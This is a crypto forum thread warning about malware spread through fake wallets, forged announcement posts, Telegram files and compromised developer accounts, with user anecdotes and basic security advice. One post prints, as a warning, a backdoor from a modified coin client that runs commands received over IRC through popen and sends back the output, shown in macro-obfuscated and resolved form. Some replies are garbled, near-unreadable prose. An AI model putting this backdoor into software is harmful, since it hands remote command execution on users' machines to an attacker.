Beware of Increasingly Sophisticated Malware Infection Attempts

[JayCue]

I was one of the victims of this malware 'scams' who took all my Minexcoin. My anti-virus didn't alert me of any suspicious activity on my pc until I open my wallet with a zero balance. I just wish I did stake my MNX on the minex bank. 

[Myno]

Basic , thanks representing your distribution . This data is extremely significant representing each fellow of this assembly . That's a extremely devil-may-care conflict , reason should anyone achieve that. We have to be deliberate of malware assails and have to study many almost how to keep off them.

[Wylokel]

Any actions have to be entranced which are great sufficiency to keep safe your organizations to be hacked much as not to apply unnamed exe, apply of unix which look as if to be fewer vunarable to virus.

[Who I]

Beware of various sites that are advertised all over the Internet. I once accidentally went to such a site and my computer began to attack bitcoin mining viruses. 3 days I was attacked by them

[intsol]

Yes, attacks are getting more sophisticated.
There are also .SCR "screenshot" downloads being circulated in Telegram groups.
These are actually malware Screensaver EXE's which are able to scrape private keys.

Take Care out there

intsol

[SandraStark]

Thank you very much for the information! I didn't even know about such a infection ... I always try to sidestep various unfamiliar programs ... But for example, more and more conditions are encountered in bounty campaigns - download the wallet ...This is often alarming. Especially if the project does not inspire confidence, even after reading the white paper. Recently I found out that telegrams actively distribute links in chat rooms on behalf of well-known projects whose files contain a virus ... When you open a file, it loads, it is not just viewed in the chat.
 

[weblife]

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:

Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
	CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		CFree(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
	}
}

here is the source code with macros resolved:

Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
	FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		pclose(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
	}
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

OMG thank you for warning this kind of "hacking"

[Hermelda]

The malware and cryptoware threat is absolutely there. The first thing you should do is regularly make a backup of your files.
Besides that I recommend Malwarebytes or Heimdal Security Pro software together with your antivirus program. Those two will actively ... uhh, how do you say it in English? Scan or real-time check your status.
When you are the unlucky one who’s Dropbox is encrypted by Cryptoware.. Dropbox can put back a backup until 30 days I believe. Don’t wait to long contacting them.

[levitacrossfirevlt]

I am happy that there are good people, who on seeing this tries to alert people why nowadays, it is very difficult to combat this programs a simple page can damage your computer, thank you, I will check my computer

[jabrix]

Beware of various sites that are advertised all over the Internet. I once accidentally went to such a site and my computer began to attack bitcoin mining viruses. 3 days I was attacked by them

It's better to keep from attacking bad viruses, because they steal data or something valuable that is on the computer or site that we have. They are very sophisticated.
Various ways that are often used are they come in when we are browsing on the internet, and infect computers for the purpose they want. Therefore computers must be observed frequently to ensure that no viruses enter. Besides using anti-virus that is quite reliable.

[chan-lee]

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.

Yeah, I think so, too.
So we need to be careful virus.
Virus will catch our chrome cookie, so they can have our account info.
As that account, they attack master's laptop or use it for attacking other site as fake identity.

[Mrsparks]

Sometimes I wonder why humans are so malicious? I have taken note of this cited examples above but please do well to update us on any further threats available on this forum.. So we all can stay safe..

[chan-lee]

Sometimes I wonder why humans are so malicious? I have taken note of this cited examples above but please do well to update us on any further threats available on this forum.. So we all can stay safe..

Well.
But you can have solution.
For all web account,especially like binance and bitmex, and paypal account, you need to be enable 2FA verify.
So hacker cant access easily to your account.
 

[Dinmazsae]

The number of cases of cyber crime by using malware cannot be tolerated. A solution is needed to handle the case.
Malware is a term used for malicious software designed to damage or carry out unwanted actions on a computer system or what we call viruses.
Computer viruses often spread through e-mail message attachments or instant messages. Therefore, you may not open e-mail attachments unless you know who sent the message or unless you were expecting e-mail attachments. Viruses can masquerade as attachments to funny pictures, greeting cards, or audio and video files. Viruses can hide in pirated software or other files that you download.

[tunapa]

this is really not a good thing, this forum is meant to offer help and provide solutions to any issues or problems that anyone might be facing in the crypto currency community. now some people have decided to be manipulative and cause more harm by creating more problems and infecting peoples computers with malwares that seem to be a help to download wallet links. thanks for bringing this up. we all need to be more careful and do things with extra care especially now that there are too many bad people.

[jigawagawa]

These malware's are very common on Telegram Telegram especially, just last week I fell for one and got every file on my phone wiped off, it was a very painful experience for me. I learnt my lesson though, it's just sad I had to learn the hard way. This post has gone a step further in preventing more people from falling.

[Kafanchanchan]

Yeah, one comes across these malware's easily on Telegram and other similar platform, just be careful and look well before clicking on any link thrown at you on those platform. Most times they are out to cause harm

[Odetolala]

2FA does the magic for me, just that most times after battling with those malwares I end up losing very vital files, that will go a long way in hurting me to bits. So the best option still remains to stay safe, watch on links you click and the places you go on the internet

[jigawagawa]

One has to be very careful here, it is even very possible to get your phone infected for days without you getting to know.

Ways to know that your mobile device infected.
You will realise that your device might suddenly begin to slow down tremendously, many malicious apps asking you to claim items you won will be popping from nowhere, app will keep crashing unexpectedly. Then funny and very strange sounds will begin to emanate from the said phone.

Here are some ways by which hackers could get your device infected

A) compromised apps: one very common way to get your device infected is downloading an application that was specifically designed for the said purpose (infecting your device), these hackers usually repackage and rebrand these applications, making it look like it is the original, once you download and install on your device, that's it, your device will be infected with whichever malware that was  
set up on it.

How to prevent it
Never download applications from random sources, always use a link from the official website of platforms that own the application. That way, you are guaranteed of downloading the real application.

B) Malvertising: this is another very common method used by hackers to steal personal information of users, it's done by making certain ads pop on the interface of targeted websites while surfing, the moment users mistakingly click on them, his/her device automatically get infected with the virus.

How to prevent it
Always avoid clicking on random ads, alternatively you can download ad blockers to help block off suck ads from popping while surfing the internet.

[Umkar]

Trojans can still get to your android device via the Telegram application, because everyone has auto-loading of video, audio and documents in the default settings. My android tablet thus became infected with several different Trojans. Therefore, in the settings, disable autoloading of video, audio, photos, this will partially protect your phone.